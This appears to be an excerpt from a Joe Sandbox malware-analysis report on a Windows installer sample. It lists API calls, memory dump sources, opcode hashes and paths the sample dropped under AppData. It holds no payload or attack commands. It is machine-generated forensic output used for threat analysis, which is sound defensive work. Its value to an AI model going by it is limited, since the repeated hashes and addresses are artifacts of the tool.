                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PrivateProfileString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1096422788-0
                                                                                                                                                  • Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                                                  • Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
                                                                                                                                                  • Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
                                                                                                                                                  • Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759
                                                                                                                                                  APIs
                                                                                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
                                                                                                                                                  • Instruction ID: f4c604eae2506afdbcc8ec41f9b2bc8be0b1ceb91ea8510f154d928e9cd5b687
                                                                                                                                                  • Opcode Fuzzy Hash: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
                                                                                                                                                  • Instruction Fuzzy Hash: A4D012B2B08100D7DB10DFE59A08ADDB7699B10329F304A77D101F21D0D2B885419A2A
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                                  • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                                                                  • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                                  • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                                  • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                                                                  • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                                  • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
                                                                                                                                                  • Instruction ID: ad5cbb4e8c7f0aba0b65fecb58585b4f8dfec95c15ef4476e698ddf4bc3863dd
                                                                                                                                                  • Opcode Fuzzy Hash: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
                                                                                                                                                  • Instruction Fuzzy Hash: 05D0C77771414097D750DBB86E8585B73ACD7513197204C73D542F1491D178D8018939
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocGlobal
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3761449716-0
                                                                                                                                                  • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                  • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                                  • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                  • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                                    • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                                                  • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                                                  • CloseClipboard.USER32 ref: 00405658
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                  • String ID: {
                                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                                  • Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                                  • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                                                  • Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                                  • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                                  • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040473D
                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                                    • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061E1
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061F5
                                                                                                                                                    • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00406208
                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                                  • String ID: A$C:\Users\user\AppData\Local\foreslaaende$Call
                                                                                                                                                  • API String ID: 2246997448-2944485841
                                                                                                                                                  • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                                  • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                                  • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                                  • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                                  APIs
                                                                                                                                                  • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\foreslaaende\Sluggardliness, xrefs: 004020FB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\foreslaaende\Sluggardliness
                                                                                                                                                  • API String ID: 542301482-3939270230
                                                                                                                                                  • Opcode ID: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
                                                                                                                                                  • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                                                                                  • Opcode Fuzzy Hash: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
                                                                                                                                                  • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                  • Opcode ID: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
                                                                                                                                                  • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                                                                                                  • Opcode Fuzzy Hash: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
                                                                                                                                                  • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                                                                                  APIs
                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                  • String ID: CB@$Call$N$open
                                                                                                                                                  • API String ID: 3615053054-4184941720
                                                                                                                                                  • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                                  • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                                                  • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                                  • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                                                  APIs
                                                                                                                                                  • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                                                  • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                                    • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                                    • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                                                  • wsprintfA.USER32 ref: 00405C80
